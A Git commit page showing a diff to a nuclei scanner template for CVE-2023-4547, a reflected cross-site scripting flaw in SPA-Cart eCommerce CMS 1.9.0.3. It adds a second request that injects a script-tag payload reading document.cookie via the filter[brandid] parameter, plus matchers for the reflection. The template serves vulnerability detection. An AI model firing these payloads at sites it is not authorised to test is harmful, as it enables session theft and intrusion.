daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8472 from projectdiscovery/pussycat0x-patch-2 

CVE-2023-4547
patch-1
Dhiyaneshwaran 2023-11-02 11:38:10 +05:30 committed by GitHub
parent 21b4823e33 870e2ee4f7
commit a97539d34e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
http/cves/2023/CVE-2023-4547.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2023-4547
info: info:
name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
author: theamanrawat author: theamanrawat,SoSpiRo
severity: medium severity: medium
description: | description: |
A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability. A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
@ -31,15 +31,22 @@ http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB' - '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
- '{{BaseURL}}/search?filter[brandid]=vnxjb"><script>alert(document.cookie)</script>bvu51'
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- '100-1331"><script>alert(document.cookie)</script>' - '100-1331"><script>alert(document.cookie)</script>'
- '><script>alert(document.cookie)</script>bvu51'
condition: or
- type: word
part: body
words:
- '<table class="products-nav">' - '<table class="products-nav">'
condition: and
- type: word - type: word
part: header part: header
@ -48,5 +55,5 @@ http:
- type: status - type: status
status: status:
- 200
# digest: 4b0a00483046022100a596d2308a8d60566f7f265670674040d63d3364b32b7e1b98d319340f06392f022100c29a49c0c08077668ffd75b3e48e75239ecbd73a38fb371d4925861a623ef161:922c64590222798bb761d5b6d8e72950 - 200